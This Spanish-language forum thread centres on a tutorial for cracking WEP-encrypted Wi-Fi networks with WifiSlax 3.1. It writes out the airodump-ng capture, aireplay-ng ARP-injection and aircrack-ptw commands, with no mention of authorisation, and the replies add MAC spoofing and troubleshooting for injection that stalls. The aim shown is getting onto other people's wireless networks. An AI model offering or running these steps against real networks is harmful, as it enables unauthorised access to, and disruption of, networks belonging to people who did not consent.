Tios perdon por los creditos que tiene el video tutorial pero bueno lo hice hace tiempo junto con st0k
tan solo que no estoy en los creditos yo y bueno no importa se los comparo pronto are otro con
otro tipo de ataque donde ya saldra ustedes en los creditos saludos espero les guste!
¡VIDEO TUTORIAL!
[Enlace externo eliminado para invitados]

Bueno soy $t0k les ense?are a crackear redes inalambricas
o internet wifi con el wifislax 3.1 ok??? espero les guste mi
tutorial contiene imagenes y tambein contiene un video online
q pueden visualizar con solo dar click en el enlace hasta abajo
donde dice visualizar en el navegador ok?? bueno comenzamoz!
primero que nada nos bajamos el wifislax 3.1 desde la paguina oficial
aki lo deho!
wifislax cersion 3.1(683mb)
[Enlace externo eliminado para invitados]
el md5 del fichero es 911dc29262ee117e5e27770067bd2e71
bueno una vz que lo tenemos en cd lo metemos al pc
reiniciamos con el cd dentro boteamos en el cd
y cargamos el wifislax de user es root y pass toor


Imagen

BUENO CREO Q AKI NO HAY MUCHO Q EXPLICAR
Imagen

airodump-ng --ivs -w captura rtap0 (comando para sniffear!)
Imagen

Imagen

iwconfig eth1 essid (red inalambrica) key 11111
Imagen

Imagen

aireplay-ng -3 -x 1024 -g 1000000 -b 00:11:22:33:44:55 -h(MAC DE LA RED) -i rtap0 eth1
Imagen

Imagen

Imagen

aircrack-ptw (fichero que te da al inyectar con aireplay)
bueno y la clave esta donde dice clave encontrada con longitud 05:
hay esta la clave
¡En el pen-testing el eslabon mas debil es el usuario!
mmmm... bueno lo voy a ver en video que tal esta
Yo tengo muchos de estos pero necesito comprar las placa y la antena
para poder trabajar y no consigo las 2 cosas..... :(
Gracias luego lo veo...

EDITO:
no lo podes subir para descargarlo? esta pc se tilda si se ve videos
Gracias
Imagen

Mostrar/Ocultar

El enlace de descarga para Wifislax esta roto.

Web Oficial y Descargas:
[Enlace externo eliminado para invitados]

Gracias por el aporte! 1Saludo!
La tecnica esta cambiando el mundo. Este es el momento para elegir, si es un Yo o un Nosotros.
Imagen

Estado: Agarrando offset por los huevos!!
como asi que con el estandar sabemos si esta asociado wtf (?).
Imagen
en el msn ♣Conejo escribió:[26/03/11 10:39:13] Su firma contiene 281 caracteres. El máximo número de caracteres permitidos es 200.
menos mal que soy admin
FroZenFeW escribió:como asi que con el estandar sabemos si esta asociado wtf (?).
JAJAAJAJAJAJA
si totalmente nada que ver esa anotación en la imagen.
podria decirse Another WEP cracking manual encima es al pedo inyectar trafico al maximo porque si tenes mala suerte tildas el ap atacado y te quedas sin la posibilidad de entrar, aparte si la contraseña es mas larga y si usas la version vieja del aircrack puede colgarse la desencriptacion y perdiste.
porque no usan backtrack como todo el mundo? o por lo menos el aircrack actualizado y original. Como si tubiera tanto texto como para andar nesecitando traducciones

Código: Seleccionar todo

{******************************************************************************}
{** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING  **}
{******************************************************************************}
{**                                                                          **}
{** The prototypes, declarations and information in this file has been       **}
{** compiled from various sources as well as through reverse engineering     **}
{** techniques. We make no guarantee as to the correctness of the contents.  **}
{** Caution is recommended, USE AT YOUR OWN RISK.                            **}
{**                                                                          **}
{******************************************************************************}
sheva me puedes dar una mano es que no le entiendo muy bn que digamos como voi ah saber la mac? gracias
Imagen
j031 escribió:sheva me puedes dar una mano es que no le entiendo muy bn que digamos como voi ah saber la mac? gracias
Lo que viene hay es ponerse una mac falsa, no necesitas saber la tuya verdadera..
elsuc escribió:
j031 escribió:sheva me puedes dar una mano es que no le entiendo muy bn que digamos como voi ah saber la mac? gracias
Lo que viene hay es ponerse una mac falsa, no necesitas saber la tuya verdadera..
dale lo que pasa es que no le entiendo muy bn estoi confundido por ke e visto otros tutos pero son diferentes pero me piden saber la mac del remoto y mi mac mi mac ya la se
[Enlace externo eliminado para invitados] ... cas-56761/
Imagen
sera que me pueden ayudar
tengo un problema que las ARP no avanzan o es estremadamente lenta mi chipset es rtl8187
se queda asi
Read 664678 packets (got 3 ARP requests), Sent 276847 packets...(131 pps)
Read y Sent aumentan rapidamente pero ARP no bueno no es porfalta de señal por que es exelente
quisiera que me dijeran que ago mal o si no hay otra opcion segun el chipset esto debe ir muy bn y no es asi saludos
Imagen
Creo que es por que la red no tiene trafico, tendrias que inyectarselo tu. Ahora mismo no podria explicarte como yo normalmente uso spoonwep2 que es automatico..
Responder

Volver a “Adaptadores Wireless”